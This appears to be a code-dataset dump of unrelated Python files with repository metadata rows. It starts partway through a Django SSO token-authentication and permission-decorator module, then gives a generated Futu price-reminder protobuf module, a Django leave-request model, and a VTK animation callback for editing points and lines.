params={"cmd":"80010004","data":{"user_id":user_id,"client_secret":ssoClientSecret,"secret_key":MD5.encrypt("%s-%s" % (user_id,ssoClientSecret))}}
response=requests.post(url=ssoValidateUrl,json=params).json()
if response["code"]==0:
user=User.objects.get(username=response["data"]["user_name"])
if not user:
response["data"]["pk"]=user_id
user=dict_to_object(response["data"])
return (user,ticket)
else:
raise exceptions.AuthenticationFailed('User authentication failed')
else:
token= Token.objects.get(key=ticket)
if token:
user=User.objects.get(id=token.user.id)
return (user,ticket)
else:
raise exceptions.AuthenticationFailed('User authentication failed')
else:
token= Token.objects.get(key=ticket)
if token:
user=User.objects.get(id=token.user.id)
return (user,ticket)
else:
raise exceptions.AuthenticationFailed('User authentication failed')
else:
secretKey=MD5.encrypt("%s-%s-%s-%s" % (ssoRedirectUrl,ssoNotifyUrl,ssoClientId,ssoClientSecret))
url="%s?redirect_uri=%s¬ify_uri=%s&client_id=%s&secret_key=%s" % (ssoGetTicketUrl,ssoRedirectUrl,ssoNotifyUrl,ssoClientId,secretKey)
requests.get(url=url)
def authenticate_header(self, request):
pass
def permission_required(*permissions):
'''Custom decorator for permission checks'''
def wrapper(func):
def check_permission(self,request):
check=True
if len(permissions)>0:
project_id=""
if request.method=="GET":
project_id=request.GET.get("project_id","")
if request.method=="POST":
data = request.data
project_id=data["project_id"] if "project_id" in data else ""
if project_id:
projectMember=ProjectMember.objects.filter(project_id=project_id,user_id=request.user.id)
user=User.objects.get(id=request.user.id)
if len(projectMember)>0:
groupId=projectMember[0].group.id
group=Group.objects.get(id=groupId)
for permission in permissions:
if permission and len(group.permissions.filter(codename=permission))==0:
check=False
break
if not permission and not user.is_superuser:
check=False
break
else:
check=False
else:
user=User.objects.get(id=request.user.id)
if not user:
check=False
elif not user.is_superuser:
check=False
if check:
return func(self,request)
else:
raise exceptions.NotAcceptable('User does not have this permission!')
return check_permission
return wrapper
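# --- Editor's note --------------------------------------------------------
# Hypothetical usage sketch (not in the original module): wiring the custom
# TokenAuthentication class and permission_required decorator into a DRF
# view.  The view name and the 'view_project' permission codename are
# assumptions for illustration.
from rest_framework.views import APIView
from rest_framework.response import Response

class ProjectDetailView(APIView):
    authentication_classes = (TokenAuthentication,)

    @permission_required('view_project')
    def get(self, request):
        return Response({"project_id": request.GET.get("project_id", "")})
# ---------------------------------------------------------------------------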
| 42.905172
| 166
| 0.569821
| 2,369
| 0.46772
| 0
| 0
| 0
| 0
| 0
| 0
| 515
| 0.101678
|
c41b88fc454a463ac7213753efc46174f0522ef0
| 12,745
|
py
|
Python
|
futu/common/pb/Qot_GetPriceReminder_pb2.py
|
Hason-Cheung/py-futu-api
|
caa2f136ee07a2b123c79b2d75bbb524d7873e53
|
[
"Apache-2.0"
] | 858
|
2018-11-12T12:54:56.000Z
|
2022-03-10T17:35:43.000Z
|
futu/common/pb/Qot_GetPriceReminder_pb2.py
|
EricChengg/hongkong-futu-user-investment-report-generater
|
d450260a107f9e053036c31b05b8290b7b22c237
|
[
"Apache-2.0"
] | 113
|
2018-11-12T01:52:31.000Z
|
2022-02-27T03:53:07.000Z
|
futu/common/pb/Qot_GetPriceReminder_pb2.py
|
EricChengg/hongkong-futu-user-investment-report-generater
|
d450260a107f9e053036c31b05b8290b7b22c237
|
[
"Apache-2.0"
] | 201
|
2018-11-19T08:32:45.000Z
|
2022-03-23T06:39:02.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: Qot_GetPriceReminder.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Qot_Common_pb2 as Qot__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Qot_GetPriceReminder.proto',
package='Qot_GetPriceReminder',
syntax='proto2',
serialized_pb=_b('\n\x1aQot_GetPriceReminder.proto\x12\x14Qot_GetPriceReminder\x1a\x0c\x43ommon.proto\x1a\x10Qot_Common.proto\"k\n\x11PriceReminderItem\x12\x0b\n\x03key\x18\x01 \x02(\x03\x12\x0c\n\x04type\x18\x02 \x02(\x05\x12\r\n\x05value\x18\x03 \x02(\x01\x12\x0c\n\x04note\x18\x04 \x02(\t\x12\x0c\n\x04\x66req\x18\x05 \x02(\x05\x12\x10\n\x08isEnable\x18\x06 \x02(\x08\"r\n\rPriceReminder\x12&\n\x08security\x18\x01 \x02(\x0b\x32\x14.Qot_Common.Security\x12\x39\n\x08itemList\x18\x02 \x03(\x0b\x32\'.Qot_GetPriceReminder.PriceReminderItem\"=\n\x03\x43\x32S\x12&\n\x08security\x18\x01 \x01(\x0b\x32\x14.Qot_Common.Security\x12\x0e\n\x06market\x18\x02 \x01(\x05\"E\n\x03S2C\x12>\n\x11priceReminderList\x18\x01 \x03(\x0b\x32#.Qot_GetPriceReminder.PriceReminder\"1\n\x07Request\x12&\n\x03\x63\x32s\x18\x01 \x02(\x0b\x32\x19.Qot_GetPriceReminder.C2S\"j\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12&\n\x03s2c\x18\x04 \x01(\x0b\x32\x19.Qot_GetPriceReminder.S2CBJ\n\x13\x63om.futu.openapi.pbZ3github.com/futuopen/ftapi4go/pb/qotgetpricereminder')
,
dependencies=[Common__pb2.DESCRIPTOR,Qot__Common__pb2.DESCRIPTOR,])
_PRICEREMINDERITEM = _descriptor.Descriptor(
name='PriceReminderItem',
full_name='Qot_GetPriceReminder.PriceReminderItem',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='Qot_GetPriceReminder.PriceReminderItem.key', index=0,
number=1, type=3, cpp_type=2, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='Qot_GetPriceReminder.PriceReminderItem.type', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='Qot_GetPriceReminder.PriceReminderItem.value', index=2,
number=3, type=1, cpp_type=5, label=2,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='note', full_name='Qot_GetPriceReminder.PriceReminderItem.note', index=3,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='freq', full_name='Qot_GetPriceReminder.PriceReminderItem.freq', index=4,
number=5, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isEnable', full_name='Qot_GetPriceReminder.PriceReminderItem.isEnable', index=5,
number=6, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=84,
serialized_end=191,
)
_PRICEREMINDER = _descriptor.Descriptor(
name='PriceReminder',
full_name='Qot_GetPriceReminder.PriceReminder',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetPriceReminder.PriceReminder.security', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='itemList', full_name='Qot_GetPriceReminder.PriceReminder.itemList', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=193,
serialized_end=307,
)
_C2S = _descriptor.Descriptor(
name='C2S',
full_name='Qot_GetPriceReminder.C2S',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='security', full_name='Qot_GetPriceReminder.C2S.security', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='market', full_name='Qot_GetPriceReminder.C2S.market', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=370,
)
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Qot_GetPriceReminder.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='priceReminderList', full_name='Qot_GetPriceReminder.S2C.priceReminderList', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=372,
serialized_end=441,
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Qot_GetPriceReminder.Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='c2s', full_name='Qot_GetPriceReminder.Request.c2s', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=443,
serialized_end=492,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Qot_GetPriceReminder.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Qot_GetPriceReminder.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Qot_GetPriceReminder.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Qot_GetPriceReminder.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Qot_GetPriceReminder.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=494,
serialized_end=600,
)
_PRICEREMINDER.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_PRICEREMINDER.fields_by_name['itemList'].message_type = _PRICEREMINDERITEM
_C2S.fields_by_name['security'].message_type = Qot__Common__pb2._SECURITY
_S2C.fields_by_name['priceReminderList'].message_type = _PRICEREMINDER
_REQUEST.fields_by_name['c2s'].message_type = _C2S
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['PriceReminderItem'] = _PRICEREMINDERITEM
DESCRIPTOR.message_types_by_name['PriceReminder'] = _PRICEREMINDER
DESCRIPTOR.message_types_by_name['C2S'] = _C2S
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PriceReminderItem = _reflection.GeneratedProtocolMessageType('PriceReminderItem', (_message.Message,), dict(
DESCRIPTOR = _PRICEREMINDERITEM,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.PriceReminderItem)
))
_sym_db.RegisterMessage(PriceReminderItem)
PriceReminder = _reflection.GeneratedProtocolMessageType('PriceReminder', (_message.Message,), dict(
DESCRIPTOR = _PRICEREMINDER,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.PriceReminder)
))
_sym_db.RegisterMessage(PriceReminder)
C2S = _reflection.GeneratedProtocolMessageType('C2S', (_message.Message,), dict(
DESCRIPTOR = _C2S,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.C2S)
))
_sym_db.RegisterMessage(C2S)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.S2C)
))
_sym_db.RegisterMessage(S2C)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.Request)
))
_sym_db.RegisterMessage(Request)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Qot_GetPriceReminder_pb2'
# @@protoc_insertion_point(class_scope:Qot_GetPriceReminder.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pbZ3github.com/futuopen/ftapi4go/pb/qotgetpricereminder'))
# @@protoc_insertion_point(module_scope)
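# A minimal usage sketch for the generated classes above, assuming the nested
# Qot_Common.Security message exposes `market` and `code` fields (an assumption;
# check Qot_Common.proto for the real field names).
def build_get_price_reminder_request(market, code):
    """Serialize a Request asking for the price reminders of one security."""
    req = Request()
    req.c2s.security.market = market  # nested C2S -> Qot_Common.Security
    req.c2s.security.code = code
    return req.SerializeToString()    # standard protobuf message API

def parse_get_price_reminder_response(raw_bytes):
    """Deserialize a Response and return its return code and message."""
    rsp = Response()
    rsp.ParseFromString(raw_bytes)
    return rsp.retType, rsp.retMsg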
| 36.83526
| 1,141
| 0.748764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,306
| 0.259396
|
c41bd740e3e0dc24d155a81087255bfae49c7719
| 903
|
py
|
Python
|
leave/models.py
|
shoaibsaikat/Django-Office-Management
|
952aa44c2d3c2f99e91c2ed1aada17ee15fc9eb0
|
[
"Apache-2.0"
] | null | null | null |
leave/models.py
|
shoaibsaikat/Django-Office-Management
|
952aa44c2d3c2f99e91c2ed1aada17ee15fc9eb0
|
[
"Apache-2.0"
] | null | null | null |
leave/models.py
|
shoaibsaikat/Django-Office-Management
|
952aa44c2d3c2f99e91c2ed1aada17ee15fc9eb0
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from django.db.models.deletion import CASCADE
from accounts.models import User
class Leave(models.Model):
title = models.CharField(max_length=255, default='', blank=False)
user = models.ForeignKey(User, on_delete=CASCADE, blank=False, related_name='leaves')
creationDate = models.DateTimeField(auto_now_add=True)
approver = models.ForeignKey(User, on_delete=CASCADE, blank=False, related_name='leave_approvals')
approved = models.BooleanField(default=False, blank=True)
approveDate = models.DateTimeField(default=None, blank=True, null=True)
startDate = models.DateTimeField(default=None, blank=False)
endDate = models.DateTimeField(default=None, blank=False)
dayCount = models.PositiveIntegerField(default=0, blank=False)
comment = models.TextField(default='', blank=False)
def __str__(self):
return super().__str__()
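# A minimal usage sketch for the model above, assuming `requester` and `manager`
# are existing accounts.models.User instances and Django is configured.
from datetime import timedelta
from django.utils import timezone

def request_leave(requester, manager, days=5, title='Annual leave'):
    """Create a pending leave request covering `days` days starting next week."""
    start = timezone.now() + timedelta(days=7)
    return Leave.objects.create(
        title=title, user=requester, approver=manager,
        startDate=start, endDate=start + timedelta(days=days),
        dayCount=days, comment='Requested leave')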
| 45.15
| 102
| 0.75526
| 792
| 0.877076
| 0
| 0
| 0
| 0
| 0
| 0
| 29
| 0.032115
|
c41c16df2e1d607a9a0d2aad44ec758217ef96ce
| 22,021
|
py
|
Python
|
svtk/vtk_animation_timer_callback.py
|
SimLeek/pglsl-neural
|
8daaffded197cf7be4432754bc5941f1bca3239c
|
[
"MIT"
] | 5
|
2018-03-25T23:43:32.000Z
|
2019-05-18T10:35:21.000Z
|
svtk/vtk_animation_timer_callback.py
|
PyGPAI/PyGPNeural
|
8daaffded197cf7be4432754bc5941f1bca3239c
|
[
"MIT"
] | 11
|
2017-12-24T20:03:16.000Z
|
2017-12-26T00:18:34.000Z
|
svtk/vtk_animation_timer_callback.py
|
SimLeek/PyGPNeural
|
8daaffded197cf7be4432754bc5941f1bca3239c
|
[
"MIT"
] | null | null | null |
import time
import numpy as np
import vtk
from vtk.util import numpy_support
from svtk.lib.toolbox.integer import minmax
from svtk.lib.toolbox.idarray import IdArray
from svtk.lib.toolbox.numpy_helpers import normalize
import math as m
class VTKAnimationTimerCallback(object):
"""This class is called every few milliseconds by VTK based on the set frame rate. This allows for animation.
I've added several modification functions, such as adding and deleting lines/points, changing colors, etc."""
__slots__ = ["points", "point_colors", "timer_count", "points_poly",
"lines", "lines_poly", "line_colors", "line_id_array"
"last_velocity_update", "unused_locations",
"last_color_velocity_update", "renderer", "last_bg_color_velocity_update",
"last_velocity_update", "_loop_time", "remaining_lerp_fade_time", "lerp_multiplier",
"line_id_array", "point_id_array", "point_vertices", "interactor_style", "renderer",
"interactive_renderer", "_started"
]
def __init__(self):
self.timer_count = 0
self.last_velocity_update = time.clock()
self.last_color_velocity_update = time.clock()
self.last_bg_color_velocity_update = time.clock()
self._loop_time = time.clock()
self.unused_locations = []
self.remaining_lerp_fade_time = 0
self.lerp_multiplier = 1
self.line_id_array = IdArray()
self.point_id_array = IdArray()
self._started=False
def add_lines(self, lines, line_colors):
"""
Adds multiple lines between any sets of points.
Args:
lines (list, tuple, np.ndarray, np.generic):
An array in the format of [2, point_a, point_b, 2, point_c, point_d, ...]. The two is needed for VTK's
lines.
line_colors (list, tuple, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
lines.
Returns:
list: An array containing the memory locations of each of the newly inserted lines.
"""
assert (isinstance(lines, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(line_colors, (list, tuple, np.ndarray, np.generic)))
np_line_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_line_color_data = numpy_support.vtk_to_numpy(self.line_colors)
#todo: add lines in unused locations if possible
mem_locations = range(int(len(np_line_data) / 3), int((len(np_line_data) + len(lines)) / 3))
np_line_data = np.append(np_line_data, lines)
if len(np_line_color_data) > 0:
np_line_color_data = np.append(np_line_color_data, line_colors, axis=0)
else:
np_line_color_data = line_colors
vtk_line_data = numpy_support.numpy_to_vtkIdTypeArray(np_line_data, deep=True)
self.lines.SetCells(int(len(np_line_data) / 3), vtk_line_data)
vtk_line_color_data = numpy_support.numpy_to_vtk(num_array=np_line_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_line_color_data)
self.lines_poly.Modified()
self.line_id_array.add_ids(mem_locations)
return mem_locations
def del_all_lines(self):
"""
Deletes all lines.
"""
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np.array([], dtype=np.int64), deep=True)
self.lines.SetCells(0, vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np.array([]), deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_lines(self, line_indices):
#todo: change idarray to use tuples of (start,end) locations and set this to delete those partitions
"""
Delete specific lines.
Args:
line_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing line memory locations(s) to delete.
"""
np_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_color_data = numpy_support.vtk_to_numpy(self.line_colors)
if isinstance(line_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
np_new_data = []
np_new_color_data = []
for i in range(len(line_indices)):
loc = self.line_id_array.pop_id(line_indices[i])
                if loc is None:
#todo: put warning here
continue
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
else:
np_new_data = np_data[(last_loc + 1) * 3:loc * 3]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
np_new_color_data = np_color_data[(last_loc + 1):loc]
last_loc = loc
last_loc = loc
loc = len(np_data) / 3
np_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
np_data = np_data.astype(np.int64)
np_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_data, deep=True)
self.lines.SetCells(int(len(np_data) / 3), vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_points(self, point_indices):
"""
Delete specific points.
Args:
point_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing point memory locations(s) to delete.
"""
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())#1,1,1,2,1,3,1,4,1,5,1,6...
print(len(np_vert_data), len(np_point_data), len(np_point_color_data))
if isinstance(point_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
subtractor = 0
np_new_data = []
np_new_color_data = []
np_new_verts = []
for i in range(len(point_indices)):
loc = self.point_id_array.pop_id(point_indices[i])
                if loc is None:
# todo: put warning here
continue
subtractor+=1
#I could just remove the end of the array, but this keeps the lines attached to the same points
if len(np_new_verts) >0:
np_new_verts = np.append(np_new_verts, np_vert_data[(last_loc+1)*2:loc*2], axis = 0)
else:
np_new_verts = np_vert_data[(last_loc+1)*2: loc*2]
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
else:
np_new_data = np_point_data[(last_loc + 1):loc]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1)*3:loc*3], axis=0)
else:
np_new_color_data = np_point_color_data[(last_loc + 1):loc]
last_loc = loc
            if loc is None:
return
last_loc = loc
loc = len(np_point_data)
np_point_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
np_point_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1):loc], axis=0)
np_vert_data = np.append(np_new_verts, np_vert_data[(last_loc + 1)*2:loc*2], axis = 0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtk(np_point_data, deep=True)
self.points.SetData(vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data, deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
self.lines_poly.Modified()
def add_points(self, points, point_colors):
"""
Adds points in 3d space.
Args:
points (tuple, list, np.ndarray, np.generic):
An array in the format of [[x1,y1,z1], [x2,y2,x2], ..., [xn,yn,zn]]
point_colors (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added.
Returns:
"""
assert (isinstance(points, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(point_colors, (list, tuple, np.ndarray, np.generic)))
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())
print(np_vert_data)
for i in range(len(points)):
#todo: modify pointer_id_array to set free pointers to deleted data, not deleted data locations
if len(self.point_id_array.free_pointers)>0:
np_vert_data = np.append(np_vert_data, [1,self.point_id_array.free_pointers.pop()])
else:
np_vert_data = np.append(np_vert_data,[1, len(np_vert_data)/2])
mem_locations = range(int(len(np_point_data)), int((len(np_point_data) + len(points))))
if len(np_point_data) > 0:
np_point_data = np.append(np_point_data, points, axis=0)
else:
np_point_data = points
if len(point_colors) ==1:
points = np.array(points)
point_colors = np.tile(point_colors, (points.shape[0], 1))
if len(np_point_color_data) > 0:
np_point_color_data = np.append(np_point_color_data, point_colors, axis=0)
else:
np_point_color_data = point_colors
vtk_point_data = numpy_support.numpy_to_vtk(num_array=np_point_data, deep=True, array_type=vtk.VTK_FLOAT)
self.points.SetData(vtk_point_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data.astype(np.int64), deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
vtk_point_color_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_point_color_data)
self.points_poly.Modified()
self.point_id_array.add_ids(mem_locations)
#print(self.point_id_array)
return mem_locations
def add_point_field(self, widths, normal, center, color):
"""
Adds a rectangular field of points.
Args:
widths (tuple, list, np.ndarray, np.generic): an array defining the widths of each dimension of the field.
normal (tuple, list, np.ndarray, np.generic): an array defining the normal to the field. Specifies angle.
center (tuple, list, np.ndarray, np.generic): an array defining the central position of the field.
color (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added, or a single color in the form of [[r1, g1, b1]].
Returns:
A list of integers representing the memory locations where the points were added.
"""
true_normal = normalize(normal)
if not np.allclose(true_normal, [1, 0, 0]):
zn = np.cross(true_normal, [1, 0, 0])
xn = np.cross(true_normal, zn)
else:
xn = [1, 0, 0]
zn = [0, 0, 1]
point_field = np.array([])
#todo: replace for loops with numpy or gpu ops
for z in range(-int(m.floor(widths[2] / 2.0)), int(m.ceil(widths[2] / 2.0))):
for y in range(-int(m.floor(widths[1] / 2.0)), int(m.ceil(widths[1] / 2.0))):
for x in range(-int(m.floor(widths[0] / 2.0)), int(m.ceil(widths[0] / 2.0))):
vector_space_matrix = np.column_stack(
(np.transpose(xn), np.transpose(true_normal), np.transpose(zn)))
translation = np.matmul([x, y, z], vector_space_matrix)
point_location = [center[0], center[1], center[2]] + translation
point_location = [point_location]
if len(point_field)>0:
point_field = np.append(point_field, point_location, axis = 0)
else:
point_field = point_location
return self.add_points(point_field, color) #returns ids
def set_bg_color(self, color):
"""
Sets the background color of the viewport.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
r, g, b = color[0]
r,g,b = (r/255.,g/255.,b/255.)
self.renderer.SetBackground((minmax(r, 0, 1), minmax(g, 0, 1), minmax(b, 0, 1)))
self.renderer.Modified()
def set_all_point_colors(self, color):
"""
Sets the color of every point.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data = np.tile(color, (np_color_data.shape[0], 1))
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
def set_point_colors(self, colors, point_indices=None):
if point_indices is None:
if isinstance(colors, (list, tuple, np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=colors, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data[point_indices] = colors
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
